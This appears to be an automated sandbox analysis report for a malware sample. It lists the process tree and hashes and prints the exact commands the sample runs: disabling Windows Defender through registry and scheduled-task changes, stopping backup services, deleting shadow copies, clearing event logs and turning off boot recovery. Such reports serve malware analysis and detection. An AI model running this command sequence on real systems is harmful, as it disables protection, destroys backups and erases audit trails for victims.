4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 1844 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 1844 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 2112 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 2112 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 2384 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 2384 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 2612 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 2612 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 2696 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 2696 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe sc.exe PID 3584 wrote to memory of 2152 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe PID 3584 wrote to memory of 2152 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe PID 3584 wrote to memory of 1972 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe PID 3584 wrote to memory of 1972 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe PID 3584 wrote to memory of 4832 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe PID 3584 wrote to memory of 4832 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe PID 3584 wrote to memory of 1192 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe PID 3584 wrote to memory of 1192 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe PID 3584 wrote to memory of 4988 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe PID 3584 wrote to memory of 4988 3584 4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\4a484842f4376660894109a2123cd4e1917193efcce9b776e8c769fc667c05b3.bin.sample.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:8
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:4180
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:4372
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:4344
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:788
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4484 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3748
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:4248
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:524
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_13705" /y2⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_13705" /y3⤵PID:1020
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:956
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1236
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1376
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1572
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1844
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2112
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2384
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2612
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_13705" start= disabled2⤵PID:2696
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2152
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1972
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:4832
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1192
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4988
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1400
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:4876
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:4864
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4580
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:4776
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:5028
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:2880
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:5096
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:396
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:668
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2908
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:4972
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:908
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2772
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1504
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1640
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:3040
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1492
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:4472
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2884 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2952 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:4780 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:832
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2472
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3936
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3204
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:3044 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2164
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:5056 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4176 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4296 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4212 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4324 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:424 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3252 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3112
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1904 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:640 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2708
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2700
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
c43aabbeea5aa712837b8c2a08120827
SHA1c78dfefdf00448cedb7c46458998a3183845e4a1
SHA256392e0a44f7f6b1bd6427937f7e5585390c41b0be516ff3c1d313e7e6665e3412
SHA5123a1775614d5369a67db61b6e269ef09b203a7e04f2eaffcac0d40580aabf4708a65c423f7f10f1e0d85677b15c83e2d221363c2a9fc355c3c90c3feac1bbf118